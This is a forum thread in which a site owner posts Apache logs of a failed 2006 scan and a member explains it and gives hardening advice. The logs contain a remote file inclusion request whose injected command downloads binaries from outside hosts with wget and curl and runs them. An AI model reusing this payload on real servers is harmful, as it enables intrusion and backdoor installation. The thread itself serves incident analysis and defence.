Hot Downloads

Welcome, Guest
Username: Password: Remember me

TOPIC: Real Life SPAM visit to my Website!

Real Life SPAM visit to my Website! 10 years 7 months ago #14315

This is the details reported by Apache from an unfriendly visit:
Question: What did this ugly citizen try to do?
Did he cause harm? Where is this IP from?
What should be the security procedure to handle this illegal visitor?

[code:1]
200.105.234.43 - - [16/Apr/2006:20:03:50 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:03:54 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 300\par
200.105.234.43 - - [16/Apr/2006:20:03:58 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 307\par
200.105.234.43 - - [16/Apr/2006:20:04:02 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:08 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 308\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 305\par
200.105.234.43 - - [16/Apr/2006:20:04:10 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:16 -0600] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:17 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 302\par
200.105.234.43 - - [16/Apr/2006:20:04:20 -0600] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp; wget%2070.168.74.193/strange;chmod%20744%20strange; ./strange;cd%20/var/tmp;curl%20-o%20ar%20 http://207.90.211.54/ar;chmod%20744%20ar; ./ar;echo%20YYY;echo| HTTP/1.1" 404 295\par
200.105.234.43 - - [16/Apr/2006:20:04:23 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php? _REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=http://210.3.4.193/cmd.txt? &cmd=cd%20/tmp;wget%2070.168.74.193/strange; chmod%20744%20strange;./strange;cd%20/var/tmp; curl%20-o%20ar%20http://207.90.211.54/ar; chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 294\par
200.105.234.43 - - [16/Apr/2006:20:04:32 -0600] "POST /xmlrpc.php HTTP/1.1" 404 295\par[/code:1]
The administrator has disabled public write access.

Re: Real Life SPAM visit to my Website! 10 years 7 months ago #14321

  • nske
  • nske's Avatar
  • Offline
  • Expert Member
  • Posts: 613
  • Karma: 0
This was apparently caused by some little program that randomly tried to exploit the php xml-rpc bug through a number of popular scripts. It attempted to download a program uploaded somewhere at the web (probably a backdoor) and execute it. From what appears from the logs, apache returned a 404 (not found) error on all the requests so nothing happened.

To minimize your exposure against such attacks and their effects, first of all treat the user running apache as an untrusted user. You should regard every file on the filesystems that apache has read access to, as very likely to be read by an intruder. Unfortunately, some things like database account info need to be accessible, however try to keep this to a minimum. Similarily, any file or directory that apache has write access to, can allow the intruder to upload a backdoor and execute permissions can make things easier for him, so be careful with every files' permissions and consider mounting filesystems with the noexec argument. Furthermore, if possible, run apache on a seperate chroot or jail. PHP should run on safe mode and few other options definable through php.ini can have an impact on security (they are documented at the official PHP documentation).

Other than that, a well configured firewall can minimize the chance for a backdoor to work and some active application-layer monitoring software, like Snort, can detect and block these kinds of attempts. Specifically for apache, there is also [url=http://www.modsecurity.org[/url]Mod Security[/url] that can serve the same purpose.
The administrator has disabled public write access.

To Nske 10 years 7 months ago #14322

Thanks Nske.
I will take into consideration, every single word you said.
Thanks Again!!!!. :o
The administrator has disabled public write access.
Time to create page: 0.075 seconds

CCENT/CCNA

Cisco Routers

  • SSL WebVPN
  • Securing Routers
  • Policy Based Routing
  • Router on-a-Stick

VPN Security

  • Understand DMVPN
  • GRE/IPSec Configuration
  • Site-to-Site IPSec VPN
  • IPSec Modes

Cisco Help

  • VPN Client Windows 8
  • VPN Client Windows 7
  • CCP Display Problem
  • Cisco Support App.

Windows 2012

  • New Features
  • Licensing
  • Hyper-V / VDI
  • Install Hyper-V

Linux

  • File Permissions
  • Webmin
  • Groups - Users
  • Samba Setup